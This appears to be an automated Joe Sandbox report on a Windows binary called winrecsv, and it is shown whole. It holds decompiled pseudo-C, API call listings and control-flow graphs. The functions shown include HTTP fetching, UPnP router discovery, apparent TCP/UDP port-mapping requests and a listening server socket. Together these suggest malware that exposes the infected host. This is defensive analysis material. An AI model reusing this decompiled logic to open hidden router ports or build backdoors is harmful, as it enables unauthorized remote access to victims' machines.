                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}

















                                                                                  0x00405526
                                                                                  0x0040552d
                                                                                  0x00405534
                                                                                  0x0040553b
                                                                                  0x00405542
                                                                                  0x00405549
                                                                                  0x00405550
                                                                                  0x00405557
                                                                                  0x00405561
                                                                                  0x00405566
                                                                                  0x00405569
                                                                                  0x00405570
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040557a
                                                                                  0x00405583
                                                                                  0x0040558b
                                                                                  0x00405595
                                                                                  0x0040559e
                                                                                  0x004055a6
                                                                                  0x004055b0
                                                                                  0x004055b9
                                                                                  0x004055c1
                                                                                  0x004055cf
                                                                                  0x004055d9
                                                                                  0x004055e2
                                                                                  0x004055ea
                                                                                  0x004055f4
                                                                                  0x004055f8
                                                                                  0x00405601
                                                                                  0x00405609
                                                                                  0x00405693
                                                                                  0x00405698
                                                                                  0x0040569b
                                                                                  0x004056a2
                                                                                  0x004056ab
                                                                                  0x004056b1
                                                                                  0x004056b8
                                                                                  0x004056bf
                                                                                  0x004056c8
                                                                                  0x004056d0
                                                                                  0x004056d7
                                                                                  0x004056e0
                                                                                  0x004056e8
                                                                                  0x004056fa
                                                                                  0x004056fe
                                                                                  0x00405712
                                                                                  0x00405714
                                                                                  0x00405716
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040571c
                                                                                  0x00405720
                                                                                  0x00405726
                                                                                  0x0040572b
                                                                                  0x00405732
                                                                                  0x00405738
                                                                                  0x00405738
                                                                                  0x00405742
                                                                                  0x00405750
                                                                                  0x00405750
                                                                                  0x00405756
                                                                                  0x00405764
                                                                                  0x00405764
                                                                                  0x0040576a
                                                                                  0x00405778
                                                                                  0x00405778
                                                                                  0x0040577e
                                                                                  0x0040578c
                                                                                  0x0040578c
                                                                                  0x00405792
                                                                                  0x004057a5
                                                                                  0x00405794
                                                                                  0x00000000
                                                                                  0x004057a0
                                                                                  0x00405792
                                                                                  0x00000000
                                                                                  0x00405700
                                                                                  0x00000000
                                                                                  0x004056ea
                                                                                  0x00000000
                                                                                  0x004056d2
                                                                                  0x00000000
                                                                                  0x004056ba
                                                                                  0x00000000
                                                                                  0x004056a4
                                                                                  0x0040561b
                                                                                  0x0040561f
                                                                                  0x0040562d
                                                                                  0x00405672
                                                                                  0x00405682
                                                                                  0x0040562f
                                                                                  0x0040562f
                                                                                  0x00405646
                                                                                  0x0040564a
                                                                                  0x00405660
                                                                                  0x00405660
                                                                                  0x00405662
                                                                                  0x00405684
                                                                                  0x00000000
                                                                                  0x0040561f
                                                                                  0x00000000
                                                                                  0x004055ec
                                                                                  0x00000000
                                                                                  0x004055d1
                                                                                  0x00000000
                                                                                  0x004055c3
                                                                                  0x00000000
                                                                                  0x004055a8
                                                                                  0x00000000
                                                                                  0x0040558d
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}


















                                                                                  0x0040cfe6
                                                                                  0x0040cff5
                                                                                  0x0040cffa
                                                                                  0x0040cffd
                                                                                  0x0040d004
                                                                                  0x0040d00e
                                                                                  0x0040d013
                                                                                  0x0040d016
                                                                                  0x0040d01d
                                                                                  0x0040d023
                                                                                  0x0040d02d
                                                                                  0x0040d036
                                                                                  0x0040d041
                                                                                  0x0040d051
                                                                                  0x0040d05b
                                                                                  0x0040d064
                                                                                  0x0040d06c
                                                                                  0x0040d078
                                                                                  0x0040d07d
                                                                                  0x0040d080
                                                                                  0x0040d087
                                                                                  0x0040d08d
                                                                                  0x0040d092
                                                                                  0x0040d095
                                                                                  0x0040d09c
                                                                                  0x0040d0af
                                                                                  0x0040d0b4
                                                                                  0x0040d0bb
                                                                                  0x0040d0bb
                                                                                  0x0040d0c5
                                                                                  0x0040d0c5
                                                                                  0x0040d0d7
                                                                                  0x0040d0d7
                                                                                  0x0040d0e5
                                                                                  0x0040d0e5
                                                                                  0x0040d0f3
                                                                                  0x0040d0f3
                                                                                  0x0040d0f9
                                                                                  0x0040d0fe
                                                                                  0x0040d107

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12);
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}












                                                                                  0x0040d3da
                                                                                  0x0040d3e0
                                                                                  0x0040d3eb
                                                                                  0x0040d3f0
                                                                                  0x0040d3f3
                                                                                  0x0040d3fa
                                                                                  0x0040d400
                                                                                  0x0040d412
                                                                                  0x0040d424
                                                                                  0x0040d429
                                                                                  0x0040d42c
                                                                                  0x0040d438
                                                                                  0x0040d40f
                                                                                  0x00000000
                                                                                  0x0040d40f
                                                                                  0x0040d43f
                                                                                  0x0040d450
                                                                                  0x0040d457
                                                                                  0x0040d46d
                                                                                  0x0040d473
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d48c
                                                                                  0x0040d492

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
                                                                                    • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                    • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
                                                                                    • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                    • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                    • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                    • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                    • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                  • String ID: TCP$UDP
                                                                                  • API String ID: 1519345861-1097902612
                                                                                  • Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
                                                                                  • Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 217 40eea0-40eeb2 call 408e40 220 40f026-40f02a 217->220 221 40eeb8-40eef0 GetSystemInfo InitializeCriticalSection CreateEventA 217->221 222 40eef6-40ef09 CreateIoCompletionPort 221->222 223 40f01f-40f024 call 40e480 221->223 222->223 224 40ef0f-40ef19 call 40bea0 222->224 223->220 224->223 229 40ef1f-40ef37 WSASocketA 224->229 229->223 230 40ef3d-40efa0 setsockopt htons bind 229->230 230->223 231 40efa6-40efb8 listen 230->231 231->223 232 40efba-40efc5 WSACreateEvent 231->232 232->223 233 40efc7-40efd7 WSAEventSelect 232->233 233->223 234 40efd9-40efdf 233->234 235 40efe1-40eff1 call 40bf50 234->235 236 40efff-40f00f call 40bf50 234->236 240 40eff6-40effd 235->240 239 40f014-40f01e 236->239 240->235 240->236
                                                                                  C-Code - Quality: 45%
                                                                                  			E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350; // executed
                                                                                  					GetSystemInfo( &_v36); // executed
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1); // executed
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1); // executed
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					__imp__#2(_t40,  &_v100, 0x10); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0); // executed
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0); // executed
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}

























                                                                                  0x0040eea6
                                                                                  0x0040eeab
                                                                                  0x0040eead
                                                                                  0x0040eeb2
                                                                                  0x0040f02a
                                                                                  0x0040eeb8
                                                                                  0x0040eebd
                                                                                  0x0040eec3
                                                                                  0x0040eec9
                                                                                  0x0040eecd
                                                                                  0x0040eed4
                                                                                  0x0040eed7
                                                                                  0x0040eee5
                                                                                  0x0040eeeb
                                                                                  0x0040eef0
                                                                                  0x0040f01f
                                                                                  0x0040f01f
                                                                                  0x00000000
                                                                                  0x0040f024
                                                                                  0x0040eefe
                                                                                  0x0040ef04
                                                                                  0x0040ef09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef0f
                                                                                  0x0040ef14
                                                                                  0x0040ef19
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef2b
                                                                                  0x0040ef31
                                                                                  0x0040ef37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef4c
                                                                                  0x0040ef51
                                                                                  0x0040ef5d
                                                                                  0x0040ef61
                                                                                  0x0040ef65
                                                                                  0x0040ef69
                                                                                  0x0040ef6e
                                                                                  0x0040ef78
                                                                                  0x0040ef7d
                                                                                  0x0040ef81
                                                                                  0x0040ef8d
                                                                                  0x0040ef92
                                                                                  0x0040ef97
                                                                                  0x0040efa0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efaf
                                                                                  0x0040efb8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efba
                                                                                  0x0040efc0
                                                                                  0x0040efc5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efce
                                                                                  0x0040efd7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efda
                                                                                  0x0040efdf
                                                                                  0x0040efe1
                                                                                  0x0040eff1
                                                                                  0x0040eff6
                                                                                  0x0040eff7
                                                                                  0x0040effa
                                                                                  0x0040efe1
                                                                                  0x0040f00f
                                                                                  0x0040f01e
                                                                                  0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNELBASE(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNELBASE ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: f44bf53eb25655aab0bab15c203cf931556eefbb9b0229b48a9fa46040447938
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: f44bf53eb25655aab0bab15c203cf931556eefbb9b0229b48a9fa46040447938
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 241 40c930-40c957 socket 242 40ca91-40ca95 241->242 243 40c95d-40ca25 htons inet_addr setsockopt call 409880 bind lstrlenA sendto ioctlsocket 241->243 244 40ca97-40ca9d 242->244 245 40ca9f-40caa5 242->245 248 40ca2b-40ca32 243->248 244->245 249 40ca34-40ca43 call 40c840 248->249 250 40ca85-40ca89 call 409940 248->250 254 40ca48-40ca50 249->254 253 40ca8e 250->253 253->242 255 40ca52 254->255 256 40ca54-40ca83 call 408ea0 254->256 255->250 256->248
                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNELBASE(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
